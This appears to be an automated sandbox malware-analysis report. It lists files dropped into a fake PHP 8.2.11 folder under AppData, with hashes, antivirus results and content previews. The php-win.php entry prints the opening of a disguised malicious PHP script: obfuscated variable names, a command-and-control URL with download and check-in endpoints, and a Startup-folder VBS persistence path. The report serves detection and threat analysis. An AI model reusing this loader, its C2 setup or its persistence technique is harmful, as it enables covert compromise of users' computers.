                                              SSDEEP:768:NyBFBd36dyXiPL+rWxCdhnp1yYjm7KS0GkpuJ1yD2HFGx:0BHd36dyXSwWxCdHgmkkpxD2HFm
                                              MD5:BD002A5C73D47A875ED491191B231707
                                              SHA1:1EA6CEA8AC04AFA4F454AB912B5C743990F01992
                                              SHA-256:3AB82CE56DDF53F938C0BA7BF8BC9F64C40AC3BA7A99FB60A3E7B435E314991A
                                              SHA-512:1F2E184135FC1E69EA4254300F79553A46F10A972D2C8EF87B8BB040229570FF704B6B58807847F7470E461943ABF5B364206B225036627907F31D07D78910DC
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........X..X..X..Q.K.P..S..Z...g..Y..S..S..S..P..S..Z.....Z..,..]..X..,.....Z.....Y....'.Y..X.O.Y.....Y..RichX..................PE..d....?.^.........." .....Z...N......`_.................................................... .....................................................................h...............$....}..p............................~..0............p...............................text....X.......Z.................. ..`.rdata..H0...p...2...^..............@..@.data...H...........................@....pdata..h...........................@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libpq.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):289792
                                              Entropy (8bit):6.02457503405896
                                              Encrypted:false
                                              SSDEEP:6144:Dq/XnHBwK+f9ZO/immLqUfI43z7U8r7apSOOB8trbs:rf9ZO/imm+uQhO4s
                                              MD5:D448812C0806981E7E0587E8169CF6F2
                                              SHA1:E859313F5F60E2B96A4470C2AE10F134C4B2C535
                                              SHA-256:E3AD50C1B4BDFE37F62539C8A8386100933C1273981C54FC748669F5B01BE419
                                              SHA-512:E8A727D49F5E2785C5D6B1AF63E303E85AD65A2EC7F211901DA59CFD32097E8FBF8A0A5CE72EF8DA448CCACC51BEC9576917EA07577A58414AED321A00B7C59A
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............L...L...L..YL...L..M...L..7L...L..M...L..M...L..M...L..M...LP..M...L...L`..LP..M...LP..M...LP.5L...L..]L...LP..M...LRich...L........PE..d...Z..b.........." .....&...H.......$.................................................... ...@.....................................@&..d....6...............p..........................T...............................8............@..(............................text....$.......&.................. ..`.rdata.......@.......*..............@..@.data........`.......<..............@....pdata.......p.......B..............@..@.rsrc................`..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsasl.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):209920
                                              Entropy (8bit):6.388382267323861
                                              Encrypted:false
                                              SSDEEP:3072:IgtirqLNIAE97hd8+Zfy04cMAPRCQRNskTt9jp68qvU:IgW9AOY+8NcMItjh9F68qvU
                                              MD5:2554BB5EBE5D071E26C0EAF9650A5868
                                              SHA1:C546EE05C0106D35B6559615B179FB5A0ACD2B2E
                                              SHA-256:74C0885EC2553A93555469F37F8591C6A162DC8EC35B717653F6351E658F12D8
                                              SHA-512:B30170423E12DB8799A2F1024F96FF49C35225A6111C1526800EDF64641D2332C5E942B8EF5CF8AE79B73750B4B1548E69CC65317A2587EFD9401C0592F17BCD
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w@..3!.3!.3!.:YB.'!.aT.1!.aT.8!.aT.;!.aT.7!..T.5!.hI.4!..T.1!.3!.L!..T.>!..T.2!..T..2!..T.2!.Rich3!.........................PE..d...^..b.........." .....l...........k....................................................`.............................................4...D...@....`.......@..\............p..........T...............................8...............p............................text...Hk.......l.................. ..`.rdata..............p..............@..@.data...A.... ......................@....pdata..\....@... ..................@..@.rsrc........`.......0..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsodium.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):303616
                                              Entropy (8bit):6.731729252030036
                                              Encrypted:false
                                              SSDEEP:6144:fCOR4ryEOtH1TOozgElOeZm7WaW9bmJsV50DEr/ap:fwQ4h7m9bmJbDI
                                              MD5:CFC9FF4911441D1A771414F99CE84006
                                              SHA1:E64AB9389795077905210FAE10AE27AECBA6CF33
                                              SHA-256:E664ECB637867B41F19D0DDAE9019091907035F221C53E96FEE376B93199D852
                                              SHA-512:D8E1CAF00F241D563159D5B37911E033BF4236C217EBC97560CAD2451E3005113166637233735A0C4ECB7B6007B36E46247003B3C407F3595B83D20696243451
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<..<..<..D..<..]S..<..]S..<..]S..<..]S..<...T..<..<..<...L...<...L..<...Lm.<..<..<...L..<..Rich.<..................PE..d....=._.........." .....Z...L......``....................................................`.........................................."...d.............. ...........................p...T.......................(.......0............p...............................text....Y.......Z.................. ..`.rdata.......p... ...^..............@..@.data...X............~..............@....pdata..............................@..@.rsrc... ...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsqlite3.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):1646080
                                              Entropy (8bit):6.4956873496749346
                                              Encrypted:false
                                              SSDEEP:24576:RFH7bW6kvdWNX874KGisdYDLcW2ZwETrxvI5EERdWDG9IErt1:n7bcvUmnGdkwW2nxgvgQ
                                              MD5:6C509A40F1CC1DBC050F7A998C710484
                                              SHA1:5C329D668FE9910DCB3B8823187981494D3DEE3A
                                              SHA-256:3ED91FE142C59EF488CA679475F1336EA293C33EE3794448FC03DAF4089E101F
                                              SHA-512:5421ED0ECD369444FCDFBCA1E911AF5536A6674A0EA30861456E311345FA1DFEFEEED9829416C6B65979CCCAF62C9DF558EB97C6D906E562BCBD26A27C2797D1
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n..=..=..=..j=..=...<..=...<..=..=...=...<..=...<...=...<..=...<..=...<..=...<..=Rich..=........PE..d...a<.c.........." .........................................................@............`.............................................."...................@..`............0......`h...............................h..8............0...............................text............................... ..`.rdata..v....0....... ..............@..@.data....>.......4..................@....pdata..`....@.......$..............@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libssh2.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):380928
                                              Entropy (8bit):5.760798881399938
                                              Encrypted:false
                                              SSDEEP:6144:Ye7ugGStb75Tswr1/m+aPhjHlLjKq0Cov1QcWZlF4AkEEn:Y+GUVTswr1YRHcjvs9jE
                                              MD5:54C43CF2FFCFE8D96A697071D9B3FC2E
                                              SHA1:94EB1569EBE42B9497791AD0EF7802F97B9CC406
                                              SHA-256:82702E6806CA1B2EA0022C036BE67744FFE172C8DE67D86923011C58D5592941
                                              SHA-512:2BBF4F057166F9CB09374405897BAC33F647D1ED5AC20CC7B2E7A1B588E0319432489D621F2C7A65948EE12CF7B5DE2EA12DA83B65A4F3C36E34F2F8D9E729FC
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......F.....g...g...g.......g.P.f...g.P.b...g.P.c...g.P.d...g.g.f...g...c...g..f...g...f...g..c...g..g...g......g.......g..e...g.Rich..g.........................PE..d.....b.........." ......................................................... ............`.........................................Pg..6........................#......................8...............................8............................................text............................... ..`.rdata...]... ...^..................@..@.data...q............d..............@....pdata..t(.......*...h..............@..@.idata...).......*..................@..@.00cfg..Q...........................@..@.rsrc...............................@..@.reloc..U...........................@..B................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libssl-3-x64.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):777728
                                              Entropy (8bit):5.557069057741964
                                              Encrypted:false
                                              SSDEEP:12288:kmm6Zyc3n26AfDI2vIJfp9mfGIGFe9Xb:Rm6Zv326A7Zvif4GRFe9Xb
                                              MD5:16FC10BDFC778A54C51CD2EED19739E7
                                              SHA1:29473B93F50EE9D888BE36F9722EEFF27A3709F9
                                              SHA-256:5714D27792E21CE06283B526E825E1A85528D441A5BB99CCB2439F8F78D5EE8E
                                              SHA-512:2279709F73D3D31780EDE0BC69B0D1620E99262F10C122508C075E66F624F6DA2064AA0EAA368C9BF5B2F42ADD3644050A35767CCCE77F4E79BEE0D72927E6E9
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=M.Ry,..y,..y,..pTZ.u,..+Y..{,..2T..{,..+Y..r,..+Y..q,..+Y..},...Y..z,..y,..b....Y..H,...Y..x,...Y6.x,...Y..x,..Richy,..........PE..d....I.c.........." .....:..........K........................................0............`..........................................s...Q..8...........i.... ...L..............\.......8...............................8...............8............................text....9.......:.................. ..`.rdata..mu...P...v...>..............@..@.data....N.......H..................@....pdata...U... ...V..................@..@.idata..!b.......d...R..............@..@.00cfg..Q...........................@..@.rsrc...i...........................@..@.reloc..6...........................@..B................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\license.txt

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):3272
                                              Entropy (8bit):5.10056734186515
                                              Encrypted:false
                                              SSDEEP:96:LZV3rYJT3rYJ+tMCAWRx6aQktK3VE3zNGC7Sani:VBrsbrsfCHRcaQ0K363xreai
                                              MD5:67225E6A888BB1FA90425EFD90111E1B
                                              SHA1:AF2552AE64DBAB8FE3C8D7136223650484F7F695
                                              SHA-256:A8ED392BC7AE8D633F72FDF900B76975D9DD7E48C74D51ED95393917DD4C5C72
                                              SHA-512:547CC10FE6E79F836F0DA91B8A27287F39FBB015F2B01857A1EAD9116ADCC1BB69837AAEFFCFBBB9087E7B35C45D7F68CCDED4ADC3597FA959E99A1387572E28
                                              Malicious:false
                                              Preview:--------------------------------------------------------------------.. The PHP License, version 3.01..Copyright (c) 1999 - 2022 The PHP Group. All rights reserved...--------------------------------------------------------------------....Redistribution and use in source and binary forms, with or without..modification, is permitted provided that the following conditions..are met:.... 1. Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer..... 2. Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in.. the documentation and/or other materials provided with the.. distribution..... 3. The name "PHP" must not be used to endorse or promote products.. derived from this software without prior written permission. For.. written permission, please contact group@php.net..... 4. Products derived from this s

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\news.txt

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):47316
                                              Entropy (8bit):5.141064305688242
                                              Encrypted:false
                                              SSDEEP:768:SLG7dPw6AEradMRs6tiwZKXT/QbuchhtNUmczPs5wl2cYEZjYz9CfoC:S2VAEwMRhIwonuHUmczPswl2cYujICb
                                              MD5:7D238733187F4B0E28BBE451A9ED342B
                                              SHA1:47CCD75917F603A3699C19618407E3BCEF7A2EC6
                                              SHA-256:5FBE0D7759BCDE9CA354A3EF9C819A23198053DF968277AD58E678FA28C5E454
                                              SHA-512:92398BAD15A608E7397C6370A6C25019E2E8DB50AC643140A895B21FA00131103DB5DD7ACF77A3B8A68CFCDA28AAD9A2A83C1EF45E101B98065F855E74459328
                                              Malicious:false
                                              Preview:PHP NEWS..|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||..28 Sep 2023, PHP 8.2.11....- Core:.. . Fixed bug GH-11937 (Constant ASTs containing objects). (ilutov).. . Fixed bug GH-11790 (On riscv64 require libatomic if actually needed)... (Jeremie Courreges-Anglas).. . Fixed bug GH-11876: ini_parse_quantity() accepts invalid quantities... (Girgias).. . Fixed bug GH-12073 (Segfault when freeing incompletely initialized.. closures). (ilutov).. . Fixed bug GH-12060 (Internal iterator rewind handler is called twice)... (ju1ius).. . Fixed bug GH-12102 (Incorrect compile error when using array access on TMP.. value in function call). (ilutov)....- DOM:.. . Fix memory leak when setting an invalid DOMDocument encoding. (nielsdos)....- Iconv:.. . Fixed build for NetBSD which still uses the old iconv signature... (David Carlier)....- Intl:.. . Fixed bug GH-12020 (intl_

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\nghttp2.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):228352
                                              Entropy (8bit):5.07326788865085
                                              Encrypted:false
                                              SSDEEP:3072:e8nc6XxUr72c6asK25enccQmkQkxwX+GorWTmMWCxnIsfFoliLcK0lAMUi1:eGmMK25W5+liLcK0lAMUi
                                              MD5:ACD2CD76882B3296BFAAAF6FB45A916E
                                              SHA1:19ECD6099A538C35BF8A205BC0612BD6F460B938
                                              SHA-256:BC12302C8ED823FDF827F40F007246BE56EFAA69AAC9B7E9DF5836D5B32E326A
                                              SHA-512:1CC6938A10DC1AFCA058B3F02253F87B92466EB3FFAFF7056AC34BA68412496DE36AEE1FA69B55B699A3B17294C19B3ADD6E56D44DA6FC1008DDAEE8B40CD1FB
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x.c.<...<...<...5...4...n...?...n...0...n...4...n...8...Y...>...<...........+.......=.......=...<...=.......=...Rich<...........PE..d......c.........." ......................................................................`..........................................$..."..............i....`..p...............D...T...8...............................8............................................text............................... ..`.rdata..57.......8..................@..@.data........P.......6..............@....pdata..<....`... ...<..............@..@.idata...............\..............@..@.00cfg..Q............j..............@..@.rsrc...i............l..............@..@.reloc..V............v..............@..B................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\phar.phar.bat

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):43
                                              Entropy (8bit):4.111629289283939
                                              Encrypted:false
                                              SSDEEP:3:mWmAtnUk9EX5n:d3GkmJ
                                              MD5:9C8D6858FE19259B1BE399080BE8608F
                                              SHA1:CAA83D1D0AA6865E6A357AAD820C45EE19EBDF8C
                                              SHA-256:EF0F0BD1E919EE96C7D20547F7A823218CD73452F36C47D1A22F2726D5D64308
                                              SHA-512:9585E997A18F306DBA6EE8F35DBFBA17D4F782F613A65038DB1BF1CA3D3FF4C2B58F4B41CE96153D12C4E2927F379F7FE590635F5812C9553E303A90AA25E220
                                              Malicious:false
                                              Preview:"%~dp0php.exe" "%~dp0pharcommand.phar" %*..

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\pharcommand.phar

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65969
                                              Entropy (8bit):4.489844579399281
                                              Encrypted:false
                                              SSDEEP:768:HLx4vdbSm8dxT5JAxUDd3mqsEZ+ODgx9KlT/65KwKqKHya2n:HMss4gr065NJOyZn
                                              MD5:57261E9AE983606A87B6A8E9B2CC2D56
                                              SHA1:C99B69EAD0E8F24F3FA3EC356FCA5B0897C19693
                                              SHA-256:28853C7CB69E4C7397BDF9B548CC1CEDCC335FCA66DCCC892E0129D64E92A093
                                              SHA-512:0E84F60A6210547996785A671C4297D79BB8964141B57FFA814A3FFE3F2272BB06C2B02F5C85F41B5E25CFEDD48888E20C0271ED9231766D2FDC998EB0E8F2D4
                                              Malicious:false
                                              Preview:<?php../** @file phar.php. * @ingroup Phar. * @brief class CLICommand. * @author Marcus Boerger. * @date 2007 - 2008. *. * Phar Command. */..if (!extension_loaded('phar')).{. if (!class_exists('PHP_Archive', 0)) {. echo "Neither Extension Phar nor class PHP_Archive are available.\n";. exit(1);. }. if (!in_array('phar', stream_get_wrappers())) {. stream_wrapper_register('phar', 'PHP_Archive');. }. if (!class_exists('Phar',0)) {. require 'phar://'.__FILE__.'/phar.inc';. }.}..foreach(array("SPL", "Reflection") as $ext).{. if (!extension_loaded($ext)) {. echo "$argv[0] requires PHP extension $ext.\n";. exit(1);. }.}..function command_include($file).{. $file = 'phar://' . __FILE__ . '/' . $file;. if (file_exists($file)) {. include($file);. }.}..function command_autoload($classname).{. command_include(strtolower($classname) . '.inc');.}..Phar::mapPhar();..spl_autoload_register('command_autoload');..new P

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-cgi.exe

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):69120
                                              Entropy (8bit):5.916169026507824
                                              Encrypted:false
                                              SSDEEP:1536:gJYM8t1enVd6AwPjngMDVd4FHX2NfYUJVJ2sgdRdvX9:g6M8enVdUPjDHQmNfYUJVJ2sgzd/9
                                              MD5:1F4B12FCA9BAD1606DA34B4D5484A9C7
                                              SHA1:798DD9F56D08C47148823CD68CC0EFA35ECFB48D
                                              SHA-256:62CC30963A417C651050BEE51A2583500963EE58FA1C614079F579B7448A3F3D
                                              SHA-512:04F0DF9CA4A98DB522C03D95E5AB3624C9822FB18C7592C9D6F9D584A8350AA426775DEFBF5E6473236FF0D00D4B66565670939C1435A8C35A89676D683BE82E
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@.y....,...,...,..,...,V..-...,b..,...,V..-...,V..-...,V..-...,O..-...,...-...,...,...,...-...,...-...,...,...,...-...,Rich...,................PE..d...q..e.........."..........v.................@.............................p............`.............................................P............@.......0...............`.........T.......................(... ...8...............X............................text............................... ..`.rdata..bU.......V..................@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.exe

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):38400
                                              Entropy (8bit):5.461428834069935
                                              Encrypted:false
                                              SSDEEP:768:uGqJhfKQD3qbOQRicjKgrj14eMTQ/+5U2cL5qdq:uG8jGbOQRicRrjO5TQ/+WNmq
                                              MD5:1FF200E101740BAECE3BA20CB8C38741
                                              SHA1:E0D33038DD830961F72BBF9AC2A45D34404F6BCC
                                              SHA-256:49B38E609F05F9E100AEC0AC6CA61AE1A2440276623C11FC7A7224161922C998
                                              SHA-512:6D5C52515F07F6D527A3EC2C4F891285DFC3C36C74F803B8A5934704C5465E69CA6BB6F6C6E77C0E2EB3A4D4F328AF0EE867585EC3066B279FC7210D080F5ACB
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.\./]\./]\./]U..]R./]...\^./]:..]_./]..*\O./]..+\V./]..,\_./]...\X./]...\_./]\..]../]..'\_./]../\]./]...]]./]..-\]./]Rich\./]................PE..d......e.........."......8...Z.......=.........@.........................................`..........................................u.......u.......... ............................l..T....................n..(....l..8............P..(............................text....6.......8.................. ..`.rdata..6<...P...>...<..............@..@.data................z..............@....pdata...............~..............@..@.rsrc... ...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PHP script, ASCII text, with very long lines (9285)
                                              Category:dropped
                                              Size (bytes):9292
                                              Entropy (8bit):5.936670441269636
                                              Encrypted:false
                                              SSDEEP:192:PZ5xSkBkpNEuO+OZIiQ9YHwFDvZQsWaKL/cmxDYoBXC9t546RId:wkBkpNEp+OZG/xhs0ROXEt546RId
                                              MD5:22C0F427228C72076DB41B2F0B14CE4B
                                              SHA1:12FF9FE8081BFD32FE5AE0E13671ACAEB1B70EBE
                                              SHA-256:29FCE9FA54E4AB6B4BEE7D0EE074D114B682DF3A656941386BD2438ADDB9092C
                                              SHA-512:83713A3B10BC2E8DFACA835532CBB053C4858844361C90841BE902D95B61A40ED26EC6544FAF588389F86480BAF59BE90082F3B6B43C6CA7119AB911C14E1C3F
                                              Malicious:false
                                              Preview:<?php. $WaDQOBKStVPFGNr = "http://rodgersluciecassy.com/mbp"; $kQnJBXcTfDmsOupyRILAgh = $WaDQOBKStVPFGNr . "/apit.php"; $QoBahiCDNplUEKftjYGXvWMRzs = $WaDQOBKStVPFGNr . "/accept.php?ref=2"; $LAqeyDBGXSRzF = $WaDQOBKStVPFGNr . "/down/"; $ExVlgntRJHDpcUBiSw = false; $TdirPQgoxkvfEZLYAHmcJWb = "config.json"; $SmlVyHuiBfCkJ = "PHP-8.2.vbs"; $tiJvURcgwpkxEmLnZfSay = ""; $kmUYvZFTRgeLCxJOsQ = realpath(dirname(__FILE__)) . "\\" . $TdirPQgoxkvfEZLYAHmcJWb; $eUzT = realpath(__FILE__); $trMHasNubY = sys_get_temp_dir(); $YKLGqi = getenv('APPDATA') . '\Microsoft\Windows\Start Menu\Programs\Startup'; $GUmblxCrJYFuDMoQGt = $YKLGqi."\\".$SmlVyHuiBfCkJ; $lgRhFxzpDTujQySmBCEO = $trMHasNubY."\\".XirzdcNPYGojUMEkVf(5); $bWapICeLQtJny = false; define('bOXVPTKNHdzwflaJeRqi', "aid"); define('MbOXVPTKNHdzwflaJeRqi', "mid"); define('pSuaVT', "data"); define('izGhxDwj', "cstat"); define('rUYPGFtZeNKCWsjmVhdIXOlqba', "cmdid"); define('fBLjhvRkECpwnodGYI', 1); define('CUYzeSfwbG', 2); define('zQouxyfCEwVmbaGHDlR

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):142336
                                              Entropy (8bit):5.863362794534159
                                              Encrypted:false
                                              SSDEEP:3072:PTVD4EGuN3jr9WOJgdMSHVIFg+2b0GnmpOVd/:5D4BuN3j5WO6dH1IFgHb0umpM/
                                              MD5:FA544CF95C1B82AFC25B9C5C55C5AD73
                                              SHA1:A225AFCB13AF134C4DD1BFB1C52F776B1B7F61FB
                                              SHA-256:F2D679B234C73CC6DAB56A09C2664F5BF806BC5D7D9D5B8FA0332D521EEE3E84
                                              SHA-512:124DEF272214E504B781979C3704587BB54A4B00DDC3C277B5C8010B561805B422B1C7443FEA92C0059B73A3A83FB2063C38763F14E45FD7D94CDA06F7B85EDE
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;_.h_.h_.hV.?hK.h...i].h9.QhZ.h...iL.h...iU.h...i[.h...iY.h...i\.h_.hF.h...iZ.h...i^.h..Sh^.h...i^.hRich_.h........PE..d......e.........."..........l......p..........@.....................................+....`.....................................................@....P.......@...............p..........T.......................(.......8............................................text...<........................... ..`.rdata..\3.......4..................@..@.data....,..........................@....pdata.......@......................@..@.rsrc........P......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.ini-development

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):75696
                                              Entropy (8bit):4.933901725497133
                                              Encrypted:false
                                              SSDEEP:1536:cwdwKfjNWOAkBhVCJiMyjYmLrqiNfXLahUnI4:cmwKxRBhQIjYhqahUnI4
                                              MD5:9E13F4F8377C6B2D167C4EFFA43FE479
                                              SHA1:3645CE833E1EEBF65945A765006017A2E5CD0554
                                              SHA-256:2E9293E08C6B120136D9C52DF864C3879226B29D553EEB6AE04D1B19DAFE6F2B
                                              SHA-512:62E3F371988A8921AE0BCA91E0D99C1F4A513AC4DA420EA9799D3FA61F9C785B210AC510ABBCE2DDDB08279A7F5A569279E88B1DE0066EA39D07019EFB5624AC
                                              Malicious:false
                                              Preview:[PHP]....;;;;;;;;;;;;;;;;;;;..; About php.ini ;..;;;;;;;;;;;;;;;;;;;..; PHP's initialization file, generally called php.ini, is responsible for..; configuring many of the aspects of PHP's behavior.....; PHP attempts to find and load this configuration from a number of locations...; The following is a summary of its search order:..; 1. SAPI module specific location...; 2. The PHPRC environment variable...; 3. A number of predefined registry keys on Windows..; 4. Current working directory (except CLI)..; 5. The web server's directory (for SAPI modules), or directory of PHP..; (otherwise in Windows)..; 6. The directory from the --with-config-file-path compile time option, or the..; Windows directory (usually C:\windows)..; See the PHP docs for more specific information...; https://php.net/configuration.file....; The syntax of the file is extremely simple. Whitespace and lines..; beginning with a semicolon are silently ignored (as you probably guessed)...; Section headers (e.g. [Foo]) a

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.ini-production

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):75845
                                              Entropy (8bit):4.93433530242992
                                              Encrypted:false
                                              SSDEEP:1536:cwBwKfjNWkkBhVCJiM3jYmLr0iNfcLahUnI4:cEwKxiBhQFjYFJahUnI4
                                              MD5:9A2A80EF1CCB27D1E6A430DDF3E84E4A
                                              SHA1:BEB2802358383C7EBD7EE6959EB7864B3B21A0C2
                                              SHA-256:8683A1E49C5CAB012792165BAEF3A50528CF420526CA6E5AF096203DB63D7363
                                              SHA-512:E1271DFA06C71142BC55F7071C1366CFE856E326CC81B4CC6995839244066E174B101B4B1C4EFA3D044173A5D2DFD878E363CF5F82736894B640F7D17E08D0A8
                                              Malicious:false
                                              Preview:[PHP]....;;;;;;;;;;;;;;;;;;;..; About php.ini ;..;;;;;;;;;;;;;;;;;;;..; PHP's initialization file, generally called php.ini, is responsible for..; configuring many of the aspects of PHP's behavior.....; PHP attempts to find and load this configuration from a number of locations...; The following is a summary of its search order:..; 1. SAPI module specific location...; 2. The PHPRC environment variable...; 3. A number of predefined registry keys on Windows..; 4. Current working directory (except CLI)..; 5. The web server's directory (for SAPI modules), or directory of PHP..; (otherwise in Windows)..; 6. The directory from the --with-config-file-path compile time option, or the..; Windows directory (usually C:\windows)..; See the PHP docs for more specific information...; https://php.net/configuration.file....; The syntax of the file is extremely simple. Whitespace and lines..; beginning with a semicolon are silently ignored (as you probably guessed)...; Section headers (e.g. [Foo]) a

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8apache2_4.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):35840
                                              Entropy (8bit):5.534045616401495
                                              Encrypted:false
                                              SSDEEP:768:r7KL7Ogcb1Pop8sBdeiZwbsAmhbY78hwCcX:r7KLCgcBP28sBdei2OhbY7/Cc
                                              MD5:C6314C7934BF57B9E362EFB8F44DB927
                                              SHA1:A0EC97A40FC6D4374114C0F928B7692FE9121E9D
                                              SHA-256:8317249647E9DA30C346712F9DE5D6679CFA9F25A457F281F019FBA31F3230A1
                                              SHA-512:FAAC6C9E5BD1AAD38DB2DC082E10AC44632865FCCE1A0F9DCC3BD4115E59E4C88E5523ABD4E1DD0425823B41284322EBC635CAA8CF3D5BA02DA50A2ED80C203E
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."...f..Ef..Ef..Eo.~En..E4..Dd..E-..Dd..E...Ee..E4..Dk..E4..Dn..E4..De..E...D`..E...De..Ef..E...E...Db..E...Dg..E...Eg..E...Dg..ERichf..E........PE..d...G..e.........." .....>...J.......C....................................................`A.........................................p..P....p..................p................... d..T....................f..(....d..8............P...............................text....=.......>.................. ..`.rdata...3...P...4...B..............@..@.data................v..............@....pdata..p............z..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8embed.lib

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:current ar archive
                                              Category:dropped
                                              Size (bytes):934126
                                              Entropy (8bit):5.316735953734476
